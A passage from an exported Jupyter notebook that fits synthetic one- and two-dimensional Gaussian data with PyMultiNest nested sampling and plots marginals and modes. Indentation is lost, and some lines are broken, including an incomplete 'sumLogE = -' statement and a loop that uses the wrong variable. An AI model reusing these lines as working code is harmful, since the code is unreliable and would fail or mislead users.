p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('true\t', [param0, param1])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
sumLogE = -
for m in p.analyser.get_stats()['modes']:
sumLogE += modelAll + model(m['mean'])(thdata)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata)
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
figure()
modelAll = np.zeros(thdata.size)
errorbar(xdata[1:], np.diff(zdata),yunc*ones(zdata.size-1), fmt='o')
for km, mode in enumerate(p.analyser.get_stats()['modes']):
if km:
plot(thdata, model(mode['mean'])(thdata))
modelAll = modelAll + model(m['mean'])(thdata)
plot(thdata, modelAll)
# **Gaussian Normal**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1Dp(cube):
center = cube[0]
width = cube[1]
height = cube[2]
return lambda y: height*np.exp(-0.5*(( (center - y) / width)**2))# / sqrt(2*pi*width**2)
def gaussian1D(cube):
center = cube[0]
width = cube[1]
return lambda y: np.exp(-0.5*(( (center - y) / width)**2)) / sqrt(2*pi*width**2)
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0= 0.5#0.05
param1= 0.1#0.05
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
# model = straight_line; parameters = ["offset", "slope"]
# model = sine_wave; parameters = ["amp", "period"]
model = gaussian1D; parameters = ["center", "width"]
# model = gaussian1Dp; parameters = ["center", "width", "height"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0,param1])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
pass
def myloglike(cube, ndim, nparams):
modelNow = model(cube)(xdata)
return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('True\t', [param0, param1])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata) #* model(m[''])
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# ** MultiModel Gaussian Normal**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1Dp(cube):
center = cube[0]
width = cube[1]
height = cube[2]
return lambda y: height*np.exp(-0.5*(( (center - y) / width)**2))# / sqrt(2*pi*width**2)
def gaussian1D(cube):
center = cube[0]
width = cube[1]
return lambda y: np.exp(-0.5*(( (center - y) / width)**2)) / sqrt(2*pi*width**2)
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0a= -0.5#0.05
param0b= 0.5#0.05
param1a= 0.1#5*pi
param1b= 0.1#5*pi
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -1#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
# model = sine_wave; parameters = ["amp", "period"]
# model = straight_line; parameters = ["offset", "slope"]
model = gaussian1D; parameters = ["center", "width"]
# model = gaussian1Dp; parameters = ["center", "width", "height"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.linspace(xmin,xmax,nPts)
# xdata = np.random.uniform(xmin, xmax, nPts)
# xdata = sort(xdata)
ydata = model([param0a,param1a])(xdata) + model([param0b,param1b])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0a,param1a])(thdata) + model([param0b,param1b])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
cube[0] = cube[0]*2 - 1
cube[1] = cube[1]*2
pass
def myloglike(cube, ndim, nparams):
modelNow = model(cube)(xdata)
return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('True a\t', [param0a, param1a])
print('True b\t', [param0b, param1b])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata)# * model(m[''])
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
# ** MultiModel Gaussian Normal with Height Free**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian1Dp(cube):
center = cube[0]
width = cube[1]
height = cube[2]
return lambda y: height*np.exp(-0.5*(( (center - y) / width)**2))# / sqrt(2*pi*width**2)
def gaussian1D(cube):
center = cube[0]
width = cube[1]
return lambda y: np.exp(-0.5*(( (center - y) / width)**2)) / sqrt(2*pi*width**2)
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(42)
param0a= -0.5#0.05
param0b= 0.5#0.05
param1a= 0.1#5*pi
param1b= 0.1#5*pi
param2a= 0.8
param2b= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -1#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
# model = sine_wave; parameters = ["amp", "period"]
# model = straight_line; parameters = ["offset", "slope"]
# model = gaussian1D; parameters = ["center", "width"]
model = gaussian1Dp; parameters = ["center", "width", "height"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.linspace(xmin,xmax,nPts)
# xdata = np.random.uniform(xmin, xmax, nPts)
# xdata = sort(xdata)
ydata = model([param0a,param1a,param2a])(xdata) + model([param0b,param1b,param2b])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(10,10))
plot(thdata, model([param0a,param1a,param2a])(thdata) + model([param0b,param1b,param2b])(thdata))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
cube[0] = cube[0]*2 - 1
cube[1] = cube[1]*2
cube[2] = cube[2]*2
pass
def myloglike(cube, ndim, nparams):
modelNow = model(cube)(xdata)
return -0.5*((modelNow - ydata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3))
print('True a\t', [param0a, param1a])
print('True b\t', [param0b, param1b])
# In[ ]:
p.analyser.get_stats()
# In[ ]:
figure(figsize=(10,10))
errorbar(xdata, zdata, yunc*ones(zdata.size), fmt='o')
modelAll = np.zeros(thdata.size)
for m in p.analyser.get_stats()['modes']:
modelAll = modelAll + model(m['mean'])(thdata)# * model(m[''])
plot(thdata, model(m['mean'])(thdata))
plot(thdata, modelAll)
plot(thdata, model(p.analyser.get_best_fit()['parameters'])(thdata))
#
# # 2D Gaussian Modeling
# **2D Gaussian Normal Mono-Modal**
# In[ ]:
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
ymin = -0#*pi
ymax = 1#*pi
dy = 0.1*(ymax - ymin)
xdata = np.ones((nPts,nPts))*np.linspace(xmin,xmax,nPts)
ydata = (np.ones((nPts,nPts))*np.linspace(ymin,ymax,nPts)).T
fig = figure(figsize=(16,8))
ax = fig.add_subplot(221)
ax.imshow(xdata)
ax.set_ylim(0,nPts)
ax = fig.add_subplot(222)
ax.imshow(ydata)
ax.set_ylim(0,nPts)
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian2D(cube):
center = cube[0]
width = cube[1]
return lambda y,x: np.exp(-0.5*((( (center - y) / width)**2) + (( (center - x) / width)**2))) / sqrt(2*pi*width**2)
np.random.seed(42)
param0= 0.5#0.05
param1= 0.1#0.05
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
ymin = -0#*pi
ymax = 1#*pi
dy = 0.1*(ymax - ymin)
model = gaussian2D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, (nPts,nPts))
# thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.ones((nPts,nPts))*np.linspace(xmin,xmax,nPts)
ydata = (np.ones((nPts,nPts))*np.linspace(ymin,ymax,nPts)).T
zmodel = model([param0,param1])(ydata,xdata)
zerr = np.random.normal(0, yuncs, (nPts,nPts))
zdata = zmodel + zerr
figure(figsize=(10,10))
# imshow(thdata, model([param0,param1])(thdata))
imshow(zdata, extent=[xdata.min(), xdata.max(), ydata.min(), ydata.max()])
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
pass
def myloglike(cube, ndim, nparams):
modelNow = gaussian2D(cube)(ydata,xdata)
return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3),'\t', np.round(mode['local log-evidence'],3))
print('True\t', [param0, param1])
# In[ ]:
modelAll = np.zeros((nPts, nPts))
fig=figure(figsize=(20,10))
for km,mode in enumerate(p.analyser.get_stats()['modes']):
modelAll = modelAll + model(mode['mean'])(ydata,xdata) #* model(m[''])
ax = fig.add_subplot(1,len(p.analyser.get_stats()['modes']), km+1)
ims = ax.imshow(model(mode['mean'])(ydata,xdata))
plt.colorbar(ims)
fig = figure(figsize=(20,10))
ax = fig.add_subplot(131)
ims = ax.imshow(modelAll)
plt.colorbar(ims)
ax = fig.add_subplot(132)
ims = ax.imshow(model(p.analyser.get_best_fit()['parameters'])(ydata,xdata))
plt.colorbar(ims)
ax = fig.add_subplot(133)
# ims = ax.imshow(model([param0, param1])(ydata,xdata))
ims = ax.imshow(zdata)
plt.colorbar(ims)
# In[ ]:
p.analyser.get_stats()
# **2D Gaussian Normal Multi-Modal**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def gaussian2D(cube):
center = cube[0]
width = cube[1]
return lambda y,x: np.exp(-0.5*((( (center - y) / width)**2) + (( (center - x) / width)**2))) / sqrt(2*pi*width**2)
np.random.seed(42)
param0a= 0.75#0.05
param1a= 0.05#0.05
param0b= 0.25#0.05
param1b= 0.05#0.05
# param2= 0.8
yunc = 0.1
nPts = int(100)
nThPts= int(1e3)
xmin = -0#*pi
xmax = 1#*pi
dx = 0.1*(xmax - xmin)
ymin = -0#*pi
ymax = 1#*pi
dy = 0.1*(ymax - ymin)
model = gaussian2D; parameters = ["center", "width"]
yuncs = np.random.normal(yunc, 1e-2 * yunc, (nPts,nPts))
# thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.ones((nPts,nPts))*np.linspace(xmin,xmax,nPts)
ydata = (np.ones((nPts,nPts))*np.linspace(ymin,ymax,nPts)).T
zmodel = model([param0a,param1a])(ydata,xdata) + model([param0b,param1b])(ydata,xdata)
zerr = np.random.normal(0, yuncs, (nPts,nPts))
zdata = zmodel + zerr
figure(figsize=(10,10))
imshow(zdata, extent=[xdata.min(), xdata.max(), ydata.min(), ydata.max()])
# In[ ]:
# our probability functions
# Taken from the eggbox problem.
# model = sine_wave; parameters = ["amp", "period"]
# model = gaussian1D; parameters = ["center", "width"]
# model = straight_line; parameters = ["offset", "slope"]
def myprior(cube, ndim, nparams):
pass
def myloglike(cube, ndim, nparams):
modelNow = gaussian2D(cube)(ydata,xdata)
return -0.5*((modelNow - zdata)**2. / yuncs**2.).sum()
def null_loglike(cube, ndim, nparams):
modelNow = gaussian2D(cube)(ydata,xdata)
return -0.5*((modelNow)**2. / yuncs**2.).sum()
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
# number of dimensions our problem has
# parameters = ["x", "y"]
n_params = len(parameters)
plt.figure(figsize=(5*n_params, 5*n_params))
# we want to see some output while it is running
progress = pymultinest.ProgressPlotter(n_params = n_params, outputfiles_basename='chains/2-'); progress.start()
# threading.Timer(2, show, ["chains/2-phys_live.points.pdf"]).start() # delayed opening
# run MultiNest
pymultinest.run(myloglike, myprior, n_params, importance_nested_sampling = False, resume = False, verbose = True, sampling_efficiency = 'model', n_live_points = 1000, outputfiles_basename='chains/2-')
# ok, done. Stop our progress watcher
progress.stop()
# lets analyse the results
a = pymultinest.Analyzer(n_params = n_params, outputfiles_basename='chains/2-')
s = a.get_stats()
# fig = gcf()
# axs = fig.get_axes()
# for ax in axs:
# ax.set_ylim(-16,0)
# In[ ]:
import json
# store name of parameters, always useful
with open('%sparams.json' % a.outputfiles_basename, 'w') as f:
json.dump(parameters, f, indent=2)
# store derived stats
with open('%sstats.json' % a.outputfiles_basename, mode='w') as f:
json.dump(s, f, indent=2)
print()
print("-" * 30, 'ANALYSIS', "-" * 30)
print("Global Evidence:\n\t%.15e +- %.15e" % ( s['nested sampling global log-evidence'], s['nested sampling global log-evidence error'] ))
# In[ ]:
import matplotlib.pyplot as plt
plt.clf()
# Here we will plot all the marginals and whatnot, just to show off
# You may configure the format of the output here, or in matplotlibrc
# All pymultinest does is filling in the data of the plot.
# Copy and edit this file, and play with it.
p = pymultinest.PlotMarginalModes(a)
plt.figure(figsize=(5*n_params, 5*n_params))
#plt.subplots_adjust(wspace=0, hspace=0)
for i in range(n_params):
plt.subplot(n_params, n_params, n_params * i + i + 1)
p.plot_marginal(i, with_ellipses = True, with_points = False, grid_points=50)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
for j in range(i):
plt.subplot(n_params, n_params, n_params * j + i + 1)
#plt.subplots_adjust(left=0, bottom=0, right=0, top=0, wspace=0, hspace=0)
p.plot_conditional(i, j, with_ellipses = False, with_points = True, grid_points=30)
plt.xlabel(parameters[i])
plt.ylabel(parameters[j])
# plt.savefig("chains/marginals_multinest.pdf") #, bbox_inches='tight')
# show("chains/marginals_multinest.pdf")
plt.figure(figsize=(5*n_params, 5*n_params))
plt.subplot2grid((5*n_params, 5*n_params), loc=(0,0))
for i in range(n_params):
#plt.subplot(n_params, n_params, i + 1)
# outfile = '%s-mode-marginal-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, with_ellipses = True, with_points = False)
plt.ylabel("Probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
# outfile = '%s-mode-marginal-cumulative-%d.pdf' % (a.outputfiles_basename,i)
p.plot_modes_marginal(i, cumulative = True, with_ellipses = True, with_points = False)
plt.ylabel("Cumulative probability")
plt.xlabel(parameters[i])
# plt.savefig(outfile, format='pdf', bbox_inches='tight')
# plt.close()
print("Take a look at the pdf files in chains/")
# In[ ]:
null_logE = -4.43430028425182973E+04
print('best\t', np.round(p.analyser.get_best_fit()['parameters'],3))
